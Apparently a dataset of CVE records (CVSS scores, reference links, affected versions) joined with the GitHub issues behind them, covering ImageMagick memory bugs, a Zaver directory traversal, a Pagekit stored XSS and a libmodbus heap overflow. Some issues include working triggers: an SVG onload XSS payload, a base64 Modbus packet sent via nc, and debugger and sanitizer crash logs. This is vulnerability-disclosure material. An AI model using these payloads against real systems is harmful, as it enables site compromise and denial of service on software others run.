MagickCore/constitute.c:955 #9 0x55643e7749c5 in ConvertImageCommand MagickWand/convert.c:611 #10 0x55643e8a5152 in MagickCommandGenesis MagickWand/mogrify.c:191 #11 0x55643deb10fd in MagickMain utilities/magick.c:149 #12 0x55643deb13a8 in main utilities/magick.c:180 #13 0x7fedc57b70b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) Indirect leak of 64 byte(s) in 1 object(s) allocated from: #0 0x7fedc6b0021c in posix_memalign (/lib/x86_64-linux-gnu/libasan.so.6+0xb121c) #1 0x55643df53422 in AcquireSemaphoreMemory MagickCore/semaphore.c:154 #2 0x55643df53523 in AcquireSemaphoreInfo MagickCore/semaphore.c:200 #3 0x55643e5a4cdc in GetQuantumInfo MagickCore/quantum.c:430 #4 0x55643e5a3d82 in AcquireQuantumInfo MagickCore/quantum.c:121 #5 0x55643e309aa6 in ReadTIFFImage coders/tiff.c:1672 #6 0x55643e3c6615 in ReadImage MagickCore/constitute.c:563 #7 0x55643e3c98df in ReadImages MagickCore/constitute.c:955 #8 0x55643e7749c5 in ConvertImageCommand MagickWand/convert.c:611 #9 0x55643e8a5152 in MagickCommandGenesis MagickWand/mogrify.c:191 #10 0x55643deb10fd in MagickMain utilities/magick.c:149 #11 0x55643deb13a8 in main utilities/magick.c:180 #12 0x7fedc57b70b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) SUMMARY: AddressSanitizer: 15038036 byte(s) leaked in 59 allocation(s). ``` ## Additional information: ``` $ CC="gcc" CXX="g++" bash ./configure --disable-shared $ make ``` ``` $ export AFL_USE_ASAN=1 AFL_USE_UBSAN=1 $ export AFL_LLVM_CMPLOG=1 $ CC=/usr/local/bin/afl-clang-fast CXX=/usr/local/bin/afl-clang-fast++ bash ./configure --disable-shared $ make ``` ``` Version: ImageMagick 7.0.11-5 Q16 x86_64 2021-03-20 https://imagemagick.org Copyright: (C) 1999-2021 ImageMagick Studio LLC License: https://imagemagick.org/script/license.php Features: Cipher DPC HDRI OpenMP(5.0) Delegates (built-in): bzlib djvu fontconfig freetype jbig jng jpeg lcms lqr lzma openexr png tiff x xml zlib ```
AddressSanitizer report LeakSanitizer: detected memory leaks when executing convert command
https://api.github.com/repos/ImageMagick/ImageMagick/issues/3540/comments
11
2021-04-13T14:50:19Z
2022-11-30T17:19:10Z
https://github.com/ImageMagick/ImageMagick/issues/3540
857,040,605
3,540
4,058
CVE-2022-38794
2022-08-27T21:15:08.890
Zaver through 2020-12-15 allows directory traversal via the GET /.. substring.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/zyearn/zaver/issues/22" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/zyearn/zaver/issues/22" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zaver_project:zaver:*:*:*:*:*:*:*:*", "matchCriteriaId": "33AAE9C2-8D4D-4DCB-A971-79C8C4B29291", "versionEndExcluding": null, "versionEndIncluding": "2020-12-15", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/zyearn/zaver/issues/22
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "zyearn", "zaver" ]
Directory traversal. Hackers can gain access to a wealth of sensitive information including configuration files. ![image](https://user-images.githubusercontent.com/86256628/186872271-12b858e0-835b-4119-93d8-d21e32b7cad7.png) For example, here I can read my `.bashrc` and `zaver.conf` ![image](https://user-images.githubusercontent.com/86256628/186873163-a520fd47-48ba-44ae-afe1-85b45807f19d.png)
Serious vulnerability exists
https://api.github.com/repos/zyearn/zaver/issues/22/comments
0
2022-08-26T09:23:12Z
2023-03-09T02:07:29Z
https://github.com/zyearn/zaver/issues/22
1,352,001,188
22
4,059
CVE-2022-36573
2022-08-29T00:15:08.570
A cross-site scripting (XSS) vulnerability in Pagekit CMS v1.0.18 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Markdown text box under /blog/post/edit.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/pagekit/pagekit/issues/968" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/pagekit/pagekit/issues/968" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pagekit:pagekit:1.0.18:*:*:*:*:*:*:*", "matchCriteriaId": "A1E39691-604C-42A3-BA30-80433E0E09EA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/pagekit/pagekit/issues/968
[ "Exploit", "Third Party Advisory" ]
github.com
[ "pagekit", "pagekit" ]
## Problem An attacker can insert a constructed statement into the article. When a user visits this page, it will trigger (XSS) cross site scripting attack ![xss](https://user-images.githubusercontent.com/73064965/180004839-d1384f13-4d83-4fdc-a6c2-5cac268579cd.gif) ## EXP <svg/onrandom=random onload=confirm(1)> ![1](https://user-images.githubusercontent.com/73064965/180005136-106fd7a0-c48d-414d-89b4-ad85d6d720c1.jpg) ![2](https://user-images.githubusercontent.com/73064965/180005157-fb2ca429-efd9-49f8-b69f-de2983395c2b.jpg) ## Technical Details - Pagekit version:1.0.18. - Webserver:apache2.4.39 - Database:5.7.26 - PHP Version:7.4.3
There is an XSS vulnerability in the place where the article is edited
https://api.github.com/repos/pagekit/pagekit/issues/968/comments
1
2022-07-20T14:19:05Z
2022-07-20T14:19:55Z
https://github.com/pagekit/pagekit/issues/968
1,311,207,979
968
4,060
CVE-2022-0284
2022-08-29T15:15:09.183
A heap-based-buffer-over-read flaw was found in ImageMagick's GetPixelAlpha() function of 'pixel-accessor.h'. This vulnerability is triggered when an attacker passes a specially crafted Tagged Image File Format (TIFF) image to convert it into a PICON file format. This issue can potentially lead to a denial of service and information disclosure.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2022-0284" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2045943" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/e50f19fd73c792ebe912df8ab83aa51a243a3da7" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/4729" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2022-0284" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2045943" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/e50f19fd73c792ebe912df8ab83aa51a243a3da7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/4729" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "90A073A6-900F-44EE-B29F-05CB65058078", "versionEndExcluding": "7.1.0-20", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/ImageMagick/ImageMagick/issues/4729
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### ImageMagick version 7.1.0-20 ### Operating system Linux ### Operating system, version and so on Linux ubuntu 5.4.0-73-generic #82~18.04.1-Ubuntu SMP Fri Apr 16 15:10:02 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux ### Description Hi, ImageMagick security team This is ZhangJiaxing (@r0fm1a) from Codesafe Team of Legendsec at Qi'anxin Group. I've found a Heap Buffer Overflow vulnerability in ImageMagick 7.1.0-20.(github commit ID f54aa4e7ba8a8fb82d200844dc59804f5f6c8cbf in Tue Jan 18 20:00:38 2022 -0500).When someone uses magick to convert a tiff-format image into a picon-format file, the bug will be traggered on. Please feel free to contact me. Regards, ZhangJiaxing ### Steps to Reproduce 1. git clone ImageMagick 2. ./configure CC=gcc CFLAGS="-g -fsanitize=address" && make 3. cd utilities &&./magick convert /path/to/poc.tiff output.picon 4. The Asan logs are as follows: ==46632==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62a00000b540 at pc 0x7f7e88ca3257 bp 0x7fffdb9f7370 sp 0x7fffdb9f7360 READ of size 4 at 0x62a00000b540 thread T0 #0 0x7f7e88ca3256 in GetPixelAlpha MagickCore/pixel-accessor.h:59 #1 0x7f7e88ca763e in WritePICONImage coders/xpm.c:807 #2 0x7f7e885f73ef in WriteImage MagickCore/constitute.c:1221 #3 0x7f7e885f84a0 in WriteImages MagickCore/constitute.c:1442 #4 0x7f7e87e5239f in ConvertImageCommand MagickWand/convert.c:3332 #5 0x7f7e87f604cf in MagickCommandGenesis MagickWand/mogrify.c:188 #6 0x55a7a3ebefcf in MagickMain utilities/magick.c:150 #7 0x55a7a3ebf25a in main utilities/magick.c:182 #8 0x7f7e876c2bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #9 0x55a7a3ebe9e9 in _start (/home/r0fm1a/ImageMagick/utilities/.libs/magick+0x19e9) 0x62a00000b540 is located 0 bytes to the right of 21312-byte region [0x62a000006200,0x62a00000b540) allocated by thread T0 here: #0 0x7f7e893e3790 in posix_memalign (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdf790) #1 0x7f7e887d1c99 in AcquireAlignedMemory_POSIX MagickCore/memory.c:299 #2 0x7f7e887d1ea8 in AcquireAlignedMemory MagickCore/memory.c:377 #3 0x7f7e88582e0e in OpenPixelCache MagickCore/cache.c:3746 #4 0x7f7e8857b296 in GetImagePixelCache MagickCore/cache.c:1776 #5 0x7f7e8858b2de in SyncImagePixelCache MagickCore/cache.c:5516 #6 0x7f7e88798568 in SetImageStorageClass MagickCore/image.c:2626 #7 0x7f7e885ab718 in AcquireImageColormap MagickCore/colormap.c:152 #8 0x7f7e888731cd in SetGrayscaleImage MagickCore/quantize.c:3772 #9 0x7f7e888714e7 in QuantizeImage MagickCore/quantize.c:3118 #10 0x7f7e88866f5d in CompressImageColormap MagickCore/quantize.c:1204 #11 0x7f7e88ca6f6a in WritePICONImage coders/xpm.c:755 #12 0x7f7e885f73ef in WriteImage MagickCore/constitute.c:1221 #13 0x7f7e885f84a0 in WriteImages MagickCore/constitute.c:1442 #14 0x7f7e87e5239f in ConvertImageCommand MagickWand/convert.c:3332 #15 0x7f7e87f604cf in MagickCommandGenesis MagickWand/mogrify.c:188 #16 0x55a7a3ebefcf in MagickMain utilities/magick.c:150 #17 0x55a7a3ebf25a in main utilities/magick.c:182 #18 0x7f7e876c2bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/pixel-accessor.h:59 in GetPixelAlpha Shadow bytes around the buggy address: 0x0c547fff9650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff9660: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff9670: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff9680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c547fff9690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c547fff96a0: 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa 0x0c547fff96b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff96c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff96d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff96e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c547fff96f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==46632==ABORTING ### Images [magick_heap_bof.zip](https://github.com/ImageMagick/ImageMagick/files/7894812/magick_heap_bof.zip)
Heap Buffer Overflow
https://api.github.com/repos/ImageMagick/ImageMagick/issues/4729/comments
4
2022-01-19T07:07:49Z
2022-02-19T13:35:53Z
https://github.com/ImageMagick/ImageMagick/issues/4729
1,107,736,894
4,729
4,061
CVE-2022-0367
2022-08-29T15:15:09.370
A heap-based buffer overflow flaw was found in libmodbus in function modbus_reply() in src/modbus.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2045571" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/stephane/libmodbus/commit/b4ef4c17d618eba0adccc4c7d9e9a1ef809fc9b6" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/stephane/libmodbus/issues/614" }, { "source": "secalert@redhat.com", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/09/msg00007.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2045571" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/stephane/libmodbus/commit/b4ef4c17d618eba0adccc4c7d9e9a1ef809fc9b6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/stephane/libmodbus/issues/614" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/09/msg00007.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libmodbus:libmodbus:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4A63A4C-595F-494C-9F53-ED458E91FFE0", "versionEndExcluding": "3.1.7", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fedoraproject:extra_packages_for_enterprise_linux:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "3D9C7598-4BB4-442A-86DF-EEDE041A4CC7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/stephane/libmodbus/issues/614
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "stephane", "libmodbus" ]
## libmodbus version ebc4f4788678eda8d99e23be87c61a662a9d26b7 ## OS and/or distribution Ubuntu 20.04 focal ## Environment ,AMD EPYC 7742 64-Core @ 16x 2.25GHz ## Description Heap-based Buffer Overflow in _modbus_receive_msg ## Expected behaviour no crash. ## Actual behaviour double free or corruption (!prev) ## Steps to reproduce the behavior (commands or source code) libmodbus/tests/unit-test-server.c ``` ./unit-test-server echo "A90AAAAN/xcBYgABAIQAAQLXEQ==" | base64 -d | nc 127.0.0.1 1502 ``` ``` pwndbg> c Continuing. The client connection from 127.0.0.1 is accepted Waiting for an indication... <03><DD><00><00><00><0D><FF><17><01><62><00><01><00><84><00><01><02><D7><11> Breakpoint 3, modbus_reply (ctx=0x5555555592a0, req=0x555555559320 <incomplete sequence \335>, req_length=<optimized out>, mb_mapping=<optimized out>) at modbus.c:979 979 i < mapping_address_write + nb_write; i++, j += 2) { LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── *RAX 0x8 *RBX 0x7 *RCX 0x555555559430 ◂— 0x13000000025 /* '%' */ *RDX 0x2 *RDI 0x7fffffffde64 ◂— 0x17000000ff *RSI 0x7fffffffde70 ◂— 0x17ff7fff0000dd03 *R8 0x0 *R9 0x0 *R10 0x2 *R11 0xffffff24 *R12 0xff *R13 0x5555555592a0 ◂— 0x4000000ff *R14 0x9 *R15 0x7fffffffde70 ◂— 0x17ff7fff0000dd03 *RBP 0x555555559320 ◂— 0x17ff0d000000dd03 *RSP 0x7fffffffde20 ◂— 0x3 *RIP 0x7ffff7fbda62 (modbus_reply+1250) ◂— jle 0x7ffff7fbdaa1 ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── ► 0x7ffff7fbda62 <modbus_reply+1250> jle modbus_reply+1313 <modbus_reply+1313> 0x7ffff7fbda64 <modbus_reply+1252> mov r8d, dword ptr [rsp + 0x34] 0x7ffff7fbda69 <modbus_reply+1257> movsxd rdi, r11d 0x7ffff7fbda6c <modbus_reply+1260> lea rdx, [rbx + 2] 0x7ffff7fbda70 <modbus_reply+1264> add rdi, rdi 0x7ffff7fbda73 <modbus_reply+1267> sub rdi, rbx 0x7ffff7fbda76 <modbus_reply+1270> lea rsi, [rdx + r8*2] 0x7ffff7fbda7a <modbus_reply+1274> add rdi, qword ptr [rcx + 0x38] 0x7ffff7fbda7e <modbus_reply+1278> jmp modbus_reply+1284 <modbus_reply+1284> ↓ 0x7ffff7fbda84 <modbus_reply+1284> movzx eax, byte ptr [rbp + rbx + 0xa] 0x7ffff7fbda89 <modbus_reply+1289> movzx r8d, byte ptr [rbp + rbx + 0xb] ──────────────────────────────────────────[ SOURCE (CODE) ]─────────────────────────────────────────── In file: /home/aidai/fuzzing/libmodbus/test/libmodbus/src/modbus.c 974 rsp[rsp_length++] = nb << 1; 975 976 /* Write first. 977 10 and 11 are the offset of the first values to write */ 978 for (i = mapping_address_write, j = 10; ► 979 i < mapping_address_write + nb_write; i++, j += 2) { 980 mb_mapping->tab_registers[i] = 981 (req[offset + j] << 8) + req[offset + j + 1]; 982 } 983 984 /* and read the data for the response */ ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffffde20 ◂— 0x3 01:0008│ 0x7fffffffde28 ◂— 0x5555ffffff25 02:0010│ 0x7fffffffde30 ◂— 0x7fff00000008 03:0018│ 0x7fffffffde38 ◂— 0x8 04:0020│ 0x7fffffffde40 ◂— 0x200000001 05:0028│ 0x7fffffffde48 —▸ 0x555555559430 ◂— 0x13000000025 /* '%' */ 06:0030│ 0x7fffffffde50 ◂— 0xffffff24 07:0038│ 0x7fffffffde58 ◂— 0x1300000000 ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff7fbda62 modbus_reply+1250 f 1 0x555555555734 main+692 f 2 0x7ffff7dd80b3 __libc_start_main+243 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 modbus_reply (ctx=0x5555555592a0, req=0x555555559320 <incomplete sequence \335>, req_length=<optimized out>, mb_mapping=<optimized out>) at modbus.c:979 #1 0x0000555555555734 in main (argc=argc@entry=1, argv=argv@entry=0x7fffffffe128) at unit-test-server.c:183 #2 0x00007ffff7dd80b3 in __libc_start_main (main=0x555555555480 <main>, argc=1, argv=0x7fffffffe128, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe118) at ../csu/libc-start.c:308 #3 0x0000555555555a0e in _start () pwndbg> x/10gx 0x555555559310-0x10 0x555555559300: 0x000005de00000000 0x2e302e302e373231 0x555555559310: 0x0000000000000031 0x0000000000000111 0x555555559320: 0x17ff0d000000dd03 0x0100840001006201 0x555555559330: 0x000000000011d702 0x0000000000000000 0x555555559340: 0x0000000000000000 0x0000000000000000 pwndbg> c Continuing. Hardware watchpoint 2: *0x555555559318 Old value = 273 New value = 55057 modbus_reply (ctx=0x5555555592a0, req=0x555555559320 <incomplete sequence \335>, req_length=<optimized out>, mb_mapping=<optimized out>) at modbus.c:979 979 i < mapping_address_write + nb_write; i++, j += 2) { LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── *RAX 0xd711 RBX 0x7 RCX 0x555555559430 ◂— 0x13000000025 /* '%' */ *RDX 0x9 *RDI 0x555555559311 ◂— 0x1100000000000000 *RSI 0x9 *R8 0x11 R9 0x0 R10 0x2 R11 0xffffff24 R12 0xff R13 0x5555555592a0 ◂— 0x4000000ff R14 0x9 R15 0x7fffffffde70 ◂— 0x17ff7fff0000dd03 RBP 0x555555559320 ◂— 0x17ff0d000000dd03 RSP 0x7fffffffde20 ◂— 0x3 *RIP 0x7ffff7fbda99 (modbus_reply+1305) ◂— mov rbx, rdx ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── 0x7ffff7fbda84 <modbus_reply+1284> movzx eax, byte ptr [rbp + rbx + 0xa] 0x7ffff7fbda89 <modbus_reply+1289> movzx r8d, byte ptr [rbp + rbx + 0xb] 0x7ffff7fbda8f <modbus_reply+1295> shl eax, 8 0x7ffff7fbda92 <modbus_reply+1298> add eax, r8d 0x7ffff7fbda95 <modbus_reply+1301> mov word ptr [rdi + rbx], ax ► 0x7ffff7fbda99 <modbus_reply+1305> mov rbx, rdx 0x7ffff7fbda9c <modbus_reply+1308> cmp rsi, rdx 0x7ffff7fbda9f <modbus_reply+1311> jne modbus_reply+1280 <modbus_reply+1280> 0x7ffff7fbdaa1 <modbus_reply+1313> cmp dword ptr [rsp], r10d 0x7ffff7fbdaa5 <modbus_reply+1317> jle modbus_reply+239 <modbus_reply+239> 0x7ffff7fbdaab <modbus_reply+1323> mov rdx, qword ptr [rcx + 0x38] ──────────────────────────────────────────[ SOURCE (CODE) ]─────────────────────────────────────────── In file: /home/aidai/fuzzing/libmodbus/test/libmodbus/src/modbus.c 974 rsp[rsp_length++] = nb << 1; 975 976 /* Write first. 977 10 and 11 are the offset of the first values to write */ 978 for (i = mapping_address_write, j = 10; ► 979 i < mapping_address_write + nb_write; i++, j += 2) { 980 mb_mapping->tab_registers[i] = 981 (req[offset + j] << 8) + req[offset + j + 1]; 982 } 983 984 /* and read the data for the response */ ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffffde20 ◂— 0x3 01:0008│ 0x7fffffffde28 ◂— 0x5555ffffff25 02:0010│ 0x7fffffffde30 ◂— 0x7fff00000008 03:0018│ 0x7fffffffde38 ◂— 0x8 04:0020│ 0x7fffffffde40 ◂— 0x200000001 05:0028│ 0x7fffffffde48 —▸ 0x555555559430 ◂— 0x13000000025 /* '%' */ 06:0030│ 0x7fffffffde50 ◂— 0xffffff24 07:0038│ 0x7fffffffde58 ◂— 0x1300000000 ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff7fbda99 modbus_reply+1305 f 1 0x555555555734 main+692 f 2 0x7ffff7dd80b3 __libc_start_main+243 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> x/10gx 0x555555559310-0x10 0x555555559300: 0x000005de00000000 0x2e302e302e373231 0x555555559310: 0x0000000000000031 0x000000000000d711 0x555555559320: 0x17ff0d000000dd03 0x0100840001006201 0x555555559330: 0x000000000011d702 0x0000000000000000 0x555555559340: 0x0000000000000000 0x0000000000000000 pwndbg> heap Allocated chunk | PREV_INUSE Addr: 0x555555559000 Size: 0x291 Allocated chunk | PREV_INUSE Addr: 0x555555559290 Size: 0x61 Allocated chunk | PREV_INUSE Addr: 0x5555555592f0 Size: 0x21 Allocated chunk | PREV_INUSE Addr: 0x555555559310 Size: 0xd711 Allocated chunk Addr: 0x555555566a20 Size: 0x00 ``` then, ctrl+c close the nc. ``` pwndbg> c Continuing. [03][DD][00][00][00][05][FF][17][02][00][00] Waiting for an indication... ERROR Connection reset by peer: read Quit the loop: Connection reset by peer double free or corruption (!prev) Program received signal SIGABRT, Aborted. __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── *RAX 0x0 *RBX 0x7ffff7dae740 ◂— 0x7ffff7dae740 *RCX 0x7ffff7df718b (raise+203) ◂— mov rax, qword ptr [rsp + 0x108] *RDX 0x0 *RDI 0x2 *RSI 0x7fffffffdbd0 ◂— 0x0 *R8 0x0 *R9 0x7fffffffdbd0 ◂— 0x0 *R10 0x8 *R11 0x246 *R12 0x7fffffffde40 ◂— 0x2 *R13 0x10 *R14 0x7ffff7ffb000 ◂— 0x62756f6400001000 *R15 0x1 *RBP 0x7fffffffdf20 —▸ 0x7ffff7f9cb80 (main_arena) ◂— 0x0 *RSP 0x7fffffffdbd0 ◂— 0x0 *RIP 0x7ffff7df718b (raise+203) ◂— mov rax, qword ptr [rsp + 0x108] ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── ► 0x7ffff7df718b <raise+203> mov rax, qword ptr [rsp + 0x108] 0x7ffff7df7193 <raise+211> xor rax, qword ptr fs:[0x28] 0x7ffff7df719c <raise+220> jne raise+260 <raise+260> ↓ 0x7ffff7df71c4 <raise+260> call __stack_chk_fail <__stack_chk_fail> 0x7ffff7df71c9 nop dword ptr [rax] 0x7ffff7df71d0 <killpg> endbr64 0x7ffff7df71d4 <killpg+4> test edi, edi 0x7ffff7df71d6 <killpg+6> js killpg+16 <killpg+16> 0x7ffff7df71d8 <killpg+8> neg edi 0x7ffff7df71da <killpg+10> jmp kill 